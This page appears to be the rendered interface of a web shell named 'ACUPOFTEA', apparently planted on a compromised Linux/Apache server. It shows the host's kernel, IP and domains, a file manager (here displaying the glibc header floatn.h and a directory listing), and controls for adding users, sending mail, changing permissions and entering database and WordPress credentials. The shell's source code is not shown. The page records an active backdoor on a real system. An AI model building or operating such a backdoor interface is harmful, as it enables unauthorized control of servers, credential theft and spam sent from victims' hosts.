System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
bits
/
216.73.216.168
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
floatn.h
/* Macros to control TS 18661-3 glibc features on x86. Copyright (C) 2017-2018 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef _BITS_FLOATN_H #define _BITS_FLOATN_H #include <features.h> /* Defined to 1 if the current compiler invocation provides a floating-point type with the IEEE 754 binary128 format, and this glibc includes corresponding *f128 interfaces for it. The required libgcc support was added some time after the basic compiler support, for x86_64 and x86. */ #if (defined __x86_64__ \ ? __GNUC_PREREQ (4, 3) \ : (defined __GNU__ ? __GNUC_PREREQ (4, 5) : __GNUC_PREREQ (4, 4))) # define __HAVE_FLOAT128 1 #else # define __HAVE_FLOAT128 0 #endif /* Defined to 1 if __HAVE_FLOAT128 is 1 and the type is ABI-distinct from the default float, double and long double types in this glibc. */ #if __HAVE_FLOAT128 # define __HAVE_DISTINCT_FLOAT128 1 #else # define __HAVE_DISTINCT_FLOAT128 0 #endif /* Defined to 1 if the current compiler invocation provides a floating-point type with the right format for _Float64x, and this glibc includes corresponding *f64x interfaces for it. */ #define __HAVE_FLOAT64X 1 /* Defined to 1 if __HAVE_FLOAT64X is 1 and _Float64x has the format of long double. Otherwise, if __HAVE_FLOAT64X is 1, _Float64x has the format of _Float128, which must be different from that of long double. */ #define __HAVE_FLOAT64X_LONG_DOUBLE 1 #ifndef __ASSEMBLER__ /* Defined to concatenate the literal suffix to be used with _Float128 types, if __HAVE_FLOAT128 is 1. */ # if __HAVE_FLOAT128 # if !__GNUC_PREREQ (7, 0) || defined __cplusplus /* The literal suffix f128 exists only since GCC 7.0. */ # define __f128(x) x##q # else # define __f128(x) x##f128 # endif # endif /* Defined to a complex binary128 type if __HAVE_FLOAT128 is 1. */ # if __HAVE_FLOAT128 # if !__GNUC_PREREQ (7, 0) || defined __cplusplus /* Add a typedef for older GCC compilers which don't natively support _Complex _Float128. */ typedef _Complex float __cfloat128 __attribute__ ((__mode__ (__TC__))); # define __CFLOAT128 __cfloat128 # else # define __CFLOAT128 _Complex _Float128 # endif # endif /* The remaining of this file provides support for older compilers. */ # if __HAVE_FLOAT128 /* The type _Float128 exists only since GCC 7.0. */ # if !__GNUC_PREREQ (7, 0) || defined __cplusplus typedef __float128 _Float128; # endif /* __builtin_huge_valf128 doesn't exist before GCC 7.0. */ # if !__GNUC_PREREQ (7, 0) # define __builtin_huge_valf128() ((_Float128) __builtin_huge_val ()) # endif /* Older GCC has only a subset of built-in functions for _Float128 on x86, and __builtin_infq is not usable in static initializers. Converting a narrower sNaN to _Float128 produces a quiet NaN, so attempts to use _Float128 sNaNs will not work properly with older compilers. */ # if !__GNUC_PREREQ (7, 0) # define __builtin_copysignf128 __builtin_copysignq # define __builtin_fabsf128 __builtin_fabsq # define __builtin_inff128() ((_Float128) __builtin_inf ()) # define __builtin_nanf128(x) ((_Float128) __builtin_nan (x)) # define __builtin_nansf128(x) ((_Float128) __builtin_nans (x)) # endif /* In math/math.h, __MATH_TG will expand signbit to __builtin_signbit*, e.g.: __builtin_signbitf128, before GCC 6. However, there has never been a __builtin_signbitf128 in GCC and the type-generic builtin is only available since GCC 6. */ # if !__GNUC_PREREQ (6, 0) # define __builtin_signbitf128 __signbitf128 # endif # endif #endif /* !__ASSEMBLER__. */ #include <bits/floatn-common.h> #endif /* _BITS_FLOATN_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-03-19 10:57:46
..
DIR
-
drwxr-xr-x
2026-03-19 10:57:52
types
DIR
-
drwxr-xr-x
2026-03-19 10:57:46
a.out.h
text/plain
268 B
-rw-r--r--
2026-03-17 04:54:24
byteswap.h
text/x-c
2.39 KB
-rw-r--r--
2026-03-17 04:54:23
cmathcalls.h
text/plain
4.04 KB
-rw-r--r--
2026-03-17 04:54:19
confname.h
text/plain
23.15 KB
-rw-r--r--
2026-03-17 04:54:24
cpu-set.h
text/x-c
4.41 KB
-rw-r--r--
2026-03-17 04:54:24
dirent.h
text/x-c
1.73 KB
-rw-r--r--
2026-03-17 04:54:24
dlfcn.h
text/x-Algol68
2.46 KB
-rw-r--r--
2026-03-17 04:54:22
elfclass.h
text/x-c
426 B
-rw-r--r--
2026-03-17 04:54:54
endian.h
text/plain
176 B
-rw-r--r--
2026-03-17 04:54:23
environments.h
text/x-c
3.7 KB
-rw-r--r--
2026-03-17 04:54:24
epoll.h
text/plain
1.04 KB
-rw-r--r--
2026-03-17 04:54:24
errno.h
text/plain
1.39 KB
-rw-r--r--
2026-03-17 04:54:20
error.h
text/x-c
2.62 KB
-rw-r--r--
2026-03-17 04:54:24
eventfd.h
text/plain
1.1 KB
-rw-r--r--
2026-03-17 04:54:24
fcntl-linux.h
text/x-Algol68
13.39 KB
-rw-r--r--
2026-03-17 04:54:24
fcntl.h
text/x-c
2.19 KB
-rw-r--r--
2026-03-17 04:54:24
fcntl2.h
text/x-Algol68
5.44 KB
-rw-r--r--
2026-03-17 04:54:24
fenv.h
text/x-Algol68
4.5 KB
-rw-r--r--
2026-03-17 04:54:19
fenvinline.h
text/plain
190 B
-rw-r--r--
2026-03-17 04:54:19
floatn-common.h
text/x-c
9.54 KB
-rw-r--r--
2026-03-17 04:54:19
floatn.h
text/x-c
4.27 KB
-rw-r--r--
2026-03-17 04:54:19
flt-eval-method.h
text/plain
1.19 KB
-rw-r--r--
2026-03-17 04:54:19
fp-fast.h
text/plain
1.19 KB
-rw-r--r--
2026-03-17 04:54:19
fp-logb.h
text/plain
1011 B
-rw-r--r--
2026-03-17 04:54:19
getopt_core.h
text/x-c
3.58 KB
-rw-r--r--
2026-03-17 04:54:24
getopt_ext.h
text/x-c
2.97 KB
-rw-r--r--
2026-03-17 04:54:24
getopt_posix.h
text/x-c
1.77 KB
-rw-r--r--
2026-03-17 04:54:24
hwcap.h
text/plain
971 B
-rw-r--r--
2026-03-17 04:54:24
in.h
text/x-c
9.24 KB
-rw-r--r--
2026-03-17 04:54:51
indirect-return.h
text/plain
1.55 KB
-rw-r--r--
2026-03-17 04:54:20
initspin.h
text/plain
25 B
-rw-r--r--
2026-03-17 04:54:24
inotify.h
text/plain
1.05 KB
-rw-r--r--
2026-03-17 04:54:24
ioctl-types.h
text/x-c
2.4 KB
-rw-r--r--
2026-03-17 04:54:24
ioctls.h
text/x-c
4.37 KB
-rw-r--r--
2026-03-17 04:54:24
ipc.h
text/x-c
2.02 KB
-rw-r--r--
2026-03-17 04:54:25
ipctypes.h
text/plain
1.15 KB
-rw-r--r--
2026-03-17 04:54:25
iscanonical.h
text/x-c
2.42 KB
-rw-r--r--
2026-03-17 04:54:19
libc-header-start.h
text/x-c
2.55 KB
-rw-r--r--
2026-03-17 04:54:11
libm-simd-decl-stubs.h
text/plain
2.93 KB
-rw-r--r--
2026-03-17 04:54:19
link.h
text/x-c
4.18 KB
-rw-r--r--
2026-03-17 04:54:54
link_lavcurrent.h
text/plain
1.07 KB
-rw-r--r--
2026-03-17 04:54:54
local_lim.h
text/x-c
3.11 KB
-rw-r--r--
2026-03-17 04:54:24
locale.h
text/plain
1.33 KB
-rw-r--r--
2026-03-17 04:54:11
long-double.h
text/plain
923 B
-rw-r--r--
2026-03-17 04:54:19
math-finite.h
text/x-c
5.25 KB
-rw-r--r--
2026-03-17 04:54:19
math-vector.h
text/x-c
2.25 KB
-rw-r--r--
2026-03-17 04:54:19
mathcalls-helper-functions.h
text/plain
1.72 KB
-rw-r--r--
2026-03-17 04:54:19
mathcalls-narrow.h
text/plain
1.28 KB
-rw-r--r--
2026-03-17 04:54:19
mathcalls.h
text/plain
12.79 KB
-rw-r--r--
2026-03-17 04:54:19
mathdef.h
text/plain
890 B
-rw-r--r--
2026-03-17 04:54:19
mathinline.h
text/plain
12.71 KB
-rw-r--r--
2026-03-17 04:54:19
mman-linux.h
text/x-c
4.78 KB
-rw-r--r--
2026-03-17 04:54:24
mman-shared.h
text/plain
2.67 KB
-rw-r--r--
2026-03-17 04:54:24
mman.h
text/x-c
2.01 KB
-rw-r--r--
2026-03-17 04:54:24
monetary-ldbl.h
text/plain
1.02 KB
-rw-r--r--
2026-03-17 04:54:20
mqueue.h
text/x-c
1.22 KB
-rw-r--r--
2026-03-17 04:54:50
mqueue2.h
text/x-c
2.1 KB
-rw-r--r--
2026-03-17 04:54:50
msq.h
text/x-c
2.58 KB
-rw-r--r--
2026-03-17 04:54:25
netdb.h
text/x-c
1.23 KB
-rw-r--r--
2026-03-17 04:54:52
param.h
text/x-c
1.4 KB
-rw-r--r--
2026-03-17 04:54:24
poll.h
text/plain
2.03 KB
-rw-r--r--
2026-03-17 04:54:24
poll2.h
text/x-c
2.43 KB
-rw-r--r--
2026-03-17 04:54:24
posix1_lim.h
text/x-c
5.07 KB
-rw-r--r--
2026-03-17 04:54:24
posix2_lim.h
text/plain
2.8 KB
-rw-r--r--
2026-03-17 04:54:24
posix_opt.h
text/plain
5.63 KB
-rw-r--r--
2026-03-17 04:54:24
printf-ldbl.h
text/plain
991 B
-rw-r--r--
2026-03-17 04:54:21
pthreadtypes-arch.h
text/x-c
3.21 KB
-rw-r--r--
2026-03-17 04:54:24
pthreadtypes.h
text/x-c
3 KB
-rw-r--r--
2026-03-17 04:54:24
ptrace-shared.h
text/x-c
2.83 KB
-rw-r--r--
2026-03-17 04:54:24
resource.h
text/x-c
6.15 KB
-rw-r--r--
2026-03-17 04:54:24
sched.h
text/x-c
3.66 KB
-rw-r--r--
2026-03-17 04:54:24
select.h
text/x-c
2.06 KB
-rw-r--r--
2026-03-17 04:54:24
select2.h
text/x-c
1.4 KB
-rw-r--r--
2026-03-17 04:54:24
sem.h
text/x-c
2.56 KB
-rw-r--r--
2026-03-17 04:54:25
semaphore.h
text/x-c
1.21 KB
-rw-r--r--
2026-03-17 04:54:22
setjmp.h
text/x-c
1.26 KB
-rw-r--r--
2026-03-17 04:54:20
setjmp2.h
text/x-c
1.66 KB
-rw-r--r--
2026-03-17 04:54:20
shm.h
text/x-c
3.51 KB
-rw-r--r--
2026-03-17 04:54:25
sigaction.h
text/x-c
2.87 KB
-rw-r--r--
2026-03-17 04:54:20
sigcontext.h
text/x-c
4.16 KB
-rw-r--r--
2026-03-17 04:54:20
sigevent-consts.h
text/plain
1.44 KB
-rw-r--r--
2026-03-17 04:54:20
siginfo-arch.h
text/plain
729 B
-rw-r--r--
2026-03-17 04:54:24
siginfo-consts-arch.h
text/plain
204 B
-rw-r--r--
2026-03-17 04:54:24
siginfo-consts.h
text/x-c
5.83 KB
-rw-r--r--
2026-03-17 04:54:20
signalfd.h
text/plain
1.04 KB
-rw-r--r--
2026-03-17 04:54:24
signum-generic.h
text/plain
4.24 KB
-rw-r--r--
2026-03-17 04:54:20
signum.h
text/x-c
1.59 KB
-rw-r--r--
2026-03-17 04:54:20
sigstack.h
text/plain
1.14 KB
-rw-r--r--
2026-03-17 04:54:20
sigthread.h
text/x-c
1.65 KB
-rw-r--r--
2026-03-17 04:54:20
sockaddr.h
text/plain
1.48 KB
-rw-r--r--
2026-03-17 04:54:25
socket.h
text/x-c
15.2 KB
-rw-r--r--
2026-03-17 04:54:25
socket2.h
text/x-c
2.96 KB
-rw-r--r--
2026-03-17 04:54:25
socket_type.h
text/plain
2.16 KB
-rw-r--r--
2026-03-17 04:54:24
ss_flags.h
text/plain
1.16 KB
-rw-r--r--
2026-03-17 04:54:20
stab.def
text/plain
8.83 KB
-rw-r--r--
2026-03-17 04:54:24
stat.h
text/x-c
7.44 KB
-rw-r--r--
2026-03-17 04:54:24
statfs.h
text/x-c
1.87 KB
-rw-r--r--
2026-03-17 04:54:24
statvfs.h
text/x-c
3.34 KB
-rw-r--r--
2026-03-17 04:54:24
statx-generic.h
text/x-c
2 KB
-rw-r--r--
2026-03-17 04:54:24
statx.h
text/x-c
1.37 KB
-rw-r--r--
2026-03-17 04:54:24
stdint-intn.h
text/x-c
1.01 KB
-rw-r--r--
2026-03-17 04:54:21
stdint-uintn.h
text/x-c
1.02 KB
-rw-r--r--
2026-03-17 04:54:21
stdio-ldbl.h
text/plain
2.94 KB
-rw-r--r--
2026-03-17 04:54:21
stdio.h
text/plain
5.46 KB
-rw-r--r--
2026-03-17 04:54:21
stdio2.h
text/x-c
12.25 KB
-rw-r--r--
2026-03-17 04:54:21
stdio_lim.h
text/plain
1.18 KB
-rw-r--r--
2026-03-17 04:54:21
stdlib-bsearch.h
text/plain
1.34 KB
-rw-r--r--
2026-03-17 04:54:21
stdlib-float.h
text/plain
1.09 KB
-rw-r--r--
2026-03-17 04:54:20
stdlib-ldbl.h
text/plain
1.34 KB
-rw-r--r--
2026-03-17 04:54:20
stdlib.h
text/x-c
4.95 KB
-rw-r--r--
2026-03-17 04:54:20
string_fortified.h
text/x-c
4.57 KB
-rw-r--r--
2026-03-17 04:54:23
strings_fortified.h
text/plain
1.21 KB
-rw-r--r--
2026-03-17 04:54:23
sys_errlist.h
text/x-c
1.19 KB
-rw-r--r--
2026-03-17 04:54:21
syscall.h
text/plain
44.59 KB
-rw-r--r--
2026-03-17 04:54:24
sysctl.h
text/plain
898 B
-rw-r--r--
2026-03-17 04:54:24
syslog-ldbl.h
text/plain
1.18 KB
-rw-r--r--
2026-03-17 04:54:24
syslog-path.h
text/plain
1.04 KB
-rw-r--r--
2026-03-17 04:54:24
syslog.h
text/x-c
1.64 KB
-rw-r--r--
2026-03-17 04:54:24
sysmacros.h
text/plain
2.88 KB
-rw-r--r--
2026-03-17 04:54:24
termios.h
text/x-c
5.24 KB
-rw-r--r--
2026-03-17 04:54:24
thread-shared-types.h
text/x-c
6.58 KB
-rw-r--r--
2026-03-17 04:54:24
time.h
text/x-c
2.93 KB
-rw-r--r--
2026-03-17 04:54:23
timerfd.h
text/plain
1.08 KB
-rw-r--r--
2026-03-17 04:54:24
timex.h
text/x-c
4.49 KB
-rw-r--r--
2026-03-17 04:54:23
types.h
text/x-c
8.14 KB
-rw-r--r--
2026-03-17 04:54:24
typesizes.h
text/plain
3.32 KB
-rw-r--r--
2026-03-17 04:54:24
uintn-identity.h
text/x-c
1.5 KB
-rw-r--r--
2026-03-17 04:54:23
uio-ext.h
text/x-c
1.88 KB
-rw-r--r--
2026-03-17 04:54:24
uio_lim.h
text/plain
1.35 KB
-rw-r--r--
2026-03-17 04:54:24
unistd.h
text/x-c
10.56 KB
-rw-r--r--
2026-03-17 04:54:24
utmp.h
text/x-c
3.97 KB
-rw-r--r--
2026-03-17 04:54:53
utmpx.h
text/x-c
3.49 KB
-rw-r--r--
2026-03-17 04:54:53
utsname.h
text/plain
1.18 KB
-rw-r--r--
2026-03-17 04:54:24
waitflags.h
text/plain
1.66 KB
-rw-r--r--
2026-03-17 04:54:24
waitstatus.h
text/plain
2.23 KB
-rw-r--r--
2026-03-17 04:54:24
wchar-ldbl.h
text/plain
2.37 KB
-rw-r--r--
2026-03-17 04:54:23
wchar.h
text/plain
1.86 KB
-rw-r--r--
2026-03-17 04:54:23
wchar2.h
text/x-c
17.79 KB
-rw-r--r--
2026-03-17 04:54:23
wctype-wchar.h
text/x-c
6.15 KB
-rw-r--r--
2026-03-17 04:54:25
wordsize.h
text/plain
442 B
-rw-r--r--
2026-03-17 04:54:20
xopen_lim.h
text/x-c
3.77 KB
-rw-r--r--
2026-03-17 04:54:11
~ ACUPOFTEA - mail.ontime-ae.com